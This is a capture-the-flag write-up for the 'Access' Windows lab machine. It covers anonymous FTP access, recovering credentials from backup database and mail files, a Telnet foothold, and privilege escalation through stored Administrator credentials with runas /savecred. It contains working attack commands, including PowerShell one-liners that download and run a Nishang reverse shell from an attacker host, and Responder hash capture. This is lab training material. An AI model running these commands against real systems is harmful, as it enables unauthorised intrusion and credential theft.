Overview

Access is a Windows machine that demonstrates how exposed backup files can lead to credential recovery, initial access through Telnet, and privilege escalation by abusing stored Administrator credentials with runas /savecred.

Attack Chain

  • Enumerate exposed services and identify FTP, Telnet, and HTTP
  • Access FTP anonymously and download backup files
  • Extract credentials from a Microsoft Access database
  • Use recovered credentials to decrypt a password-protected ZIP archive
  • Extract a PST file and recover the security user password
  • Log in over Telnet as security
  • Upgrade the session with a Nishang PowerShell reverse shell
  • Discover stored Administrator credentials with cmdkey
  • Verify /savecred abuse by capturing an Administrator hash with Responder
  • Execute a reverse shell as Administrator using runas /savecred
  • Confirm an alternative discovery path through a public .lnk shortcut

Enumeration

Port Scanning

We start by defining the target and running a full TCP port scan to identify the exposed services.

export IP=10.129.2.20; export NAME=ACCESS; echo $IP; echo $NAME; ping $IP -c 1

nmap --min-rate 4500 --max-rtt-timeout 1500ms $IP -Pn -n -p- -v -oA scans/nmap_allports_$NAME

ports=$(cat scans/nmap_allports_$NAME.nmap | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//); echo $ports

nmap $IP -p$ports -Pn --disable-arp-ping -sC -sV -oA scans/nmap_initial_$NAME -v

The open TCP ports are:

21,23,80

nmap results

Findings

The scan shows a small attack surface. FTP (21) is open and becomes the first useful target because anonymous access is allowed. Telnet (23) is also exposed, which may provide an interactive login once credentials are recovered. HTTP (80) is present, but the main path comes from files exposed through FTP.

FTP Enumeration

Anonymous Access

We connect to the FTP service anonymously.

ftp ftp://anonymous:anonymous@$IP

The FTP root contains two directories: Backups and Engineer.

ftp directories

To make local analysis easier, both directories are downloaded recursively with wget. The --no-passive-ftp flag is used to avoid passive FTP issues.

wget -m --no-passive-ftp --ftp-user="anonymous" --ftp-password="anonymous" ftp://$IP/Backups

download backups

wget -m --no-passive-ftp --ftp-user="anonymous" --ftp-password="anonymous" ftp://$IP/Engineer

download engineer

Microsoft Access Database

Inside the Backups directory, we find a backup.mdb file. Checking the file type confirms that it is a Microsoft Access database. Since database backups often contain credentials, we inspect it with mdbtools.

First, list the available tables.

mdb-tables backup.mdb

mdb tables

The table list is filtered for anything user-related.

mdb-tables backup.mdb | grep --color=auto user

auth user table

The auth_user table stands out, so we export its contents.

mdb-export backup.mdb auth_user

This reveals several usernames and passwords.

auth user credentials

admin:admin
engineer:access4u@security
backup_admin:admin

Password-Protected ZIP Archive

Next, we inspect the Engineer directory and find Access Control.zip.

engineer zip

An initial attempt with unzip fails because of an unsupported compression method, so we switch to 7z.

7z x Access\ Control.zip

When prompted for a password, we use the engineer password recovered from the database: access4u@security.

extract zip with 7z

The archive extracts a file named Access Control.pst, which is a Microsoft Outlook Personal Storage file.

pst file

PST Credential Recovery

To inspect the PST file, we use readpst and extract the email contents.

readpst -tea -m "Access Control.pst"

readpst extracts the contents into 2.eml and 2.msg.

readpst extraction

Reading the email reveals that the security account password was changed to 4Cc3ssC0ntr0ller.

security password email

The recovered credentials are:

security:4Cc3ssC0ntr0ller

Foothold

Telnet Access

With valid credentials for security, we connect to the Telnet service on port 23.

telnet login

The login succeeds, but Telnet is not ideal for a stable interactive session. Several payload attempts are blocked by group policy, so we use Nishang’s Invoke-PowerShellTcp.ps1 and load it into memory.

wget https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Shells/Invoke-PowerShellTcp.ps1

The end of the script is modified to call Invoke-PowerShellTcp directly with our listener details.

nishang modification

Reverse Shell as security

The payload is hosted on a Python web server from the attacking machine, and a listener is started on port 443 using rlwrap and nc.

From the Telnet session, START is used so the existing session does not lock up. The /B argument prevents a new window from being created.

START /B "" powershell -c iex (New-Object Net.WebClient).DownloadString('http://10.10.14.23/Invoke-PowerShellTcp.ps1')

execute reverse shell

A reverse shell is caught as security.

security shell

The user flag can now be read.

type C:\Users\security\Desktop\user.txt

user flag

Privilege Escalation

Stored Credentials

After gaining access as security, we check for stored credentials with cmdkey.

cmdkey /list

The output shows stored credentials for ACCESS\Administrator.

cmdkey stored credentials

The Domain:interactive entry is important because it indicates the saved credentials can potentially be used with runas to execute commands as the stored user.

Verifying /savecred

A quick test with runas does not return terminal output, so we verify the behavior by forcing the Administrator context to authenticate to our attacking machine.

runas /user:ACCESS\Administrator /savecred "cmd /c whoami"

On the attacking machine, start Responder in analysis mode.

sudo responder -I tun0 -A

Then use runas /savecred to request a share from the attacking machine.

runas /user:ACCESS\Administrator /savecred "net use \\10.10.14.23"

Responder captures authentication from the Administrator account, confirming that /savecred can be abused.

administrator hash captured

Administrator Reverse Shell

With /savecred verified, we reuse the same Nishang reverse shell approach to execute a payload as Administrator.

Start a new listener on port 443, then execute the payload with runas.

runas /user:ACCESS\Administrator /savecred "powershell -c iex (New-Object Net.WebClient).DownloadString('http://10.10.14.23/Invoke-PowerShellTcp.ps1')"

runas reverse shell

A shell is caught as administrator.

administrator shell

The system flag can now be read.

type C:\Users\Administrator\Desktop\root.txt

system flag

Alternative Path Discovery

Public Shortcut Enumeration

There is another way to discover the same /savecred path. We recursively list the contents of C:\Users\Public.

cmd /c dir c:\users\public /A /S

An interesting .lnk shortcut is present on the public Desktop.

public lnk shortcut

Inspecting the shortcut reveals that it runs runas with the Administrator username and the /savecred argument.

lnk runas savecred

This confirms the same privilege escalation path: stored Administrator credentials can be reused with runas /savecred to execute commands as Administrator.

Key Takeaways

Access highlights how exposed backup files can quickly become a full compromise path. Anonymous FTP access revealed a database backup containing credentials, which unlocked a password-protected archive and eventually exposed Telnet credentials. The final escalation came from stored Administrator credentials, where runas /savecred allowed command execution as Administrator without knowing the password.